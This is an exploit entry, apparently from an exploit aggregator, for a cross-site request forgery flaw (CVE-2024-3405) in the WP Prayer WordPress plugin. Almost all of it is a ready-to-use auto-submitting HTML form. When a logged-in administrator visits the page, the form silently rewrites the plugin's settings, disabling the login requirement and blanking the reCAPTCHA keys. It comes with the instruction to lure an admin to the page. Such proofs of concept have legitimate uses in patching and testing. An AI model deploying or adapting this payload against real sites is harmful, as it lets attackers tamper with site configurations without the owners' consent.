Exploit for WP Prayer <= 2.0.9 - Settings Update via CSRF CVE-2024-3405

## https://sploitus.com/exploit?id=WPEX-ID:6968D43C-16FF-43A9-8451-71AABBE69014
Make a logged in admin open a page containing:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=wpe_manage_settings" method="post" enctype="multipart/form-data">
            <input type="hidden" name="wpe_num_prayer_per_page" value="csrf">
            <input type="hidden" name="wpe_prayer_btn_color" value="csrf">
            <input type="hidden" name="wpe_prayer_btn_text_color" value="csrf">
            <input type="hidden" name="wpe_pray_btn_color" value="csrf">
            <input type="hidden" name="wpe_pray_text_color" value="csrf">
            <input type="hidden" name="wpe_pray_text" value="csrf">
            <input type="hidden" name="wpe_terms_and_condition" value="">
            <input type="hidden" name="wpe_num_of_characters_in_message" value="1000000000">
            <input type="hidden" name="wpe_login_required" value="false">
            <input type="hidden" name="wpe_disapprove_prayer_default" value="true">
            <input type="hidden" name="wpe_prayer_Site_Key" value="csrf">
            <input type="hidden" name="wpe_prayer_secret_key" value="csrf">
            <input type="hidden" name="wpe_prayer_time_interval" value="csrf">
            <input type="hidden" name="wpe_prayer_comment" value="true">
            <input type="hidden" name="wpe_prayer_comment_status" value="true">
            <input type="hidden" name="wpe_categorylist" value="1">
            <input type="hidden" name="wpe_fetch_req_from" value="all">
            <input type="hidden" name="wpe_thankyou" value="csrf">
            <input type="submit" name="wpe_save_settings" value="Save Settings">
            <input type="hidden" name="operation" value="save">
            <input type="hidden" name="page_options" value="wpe_api_key,wpe_scripts_place">
          </form>
</body>

```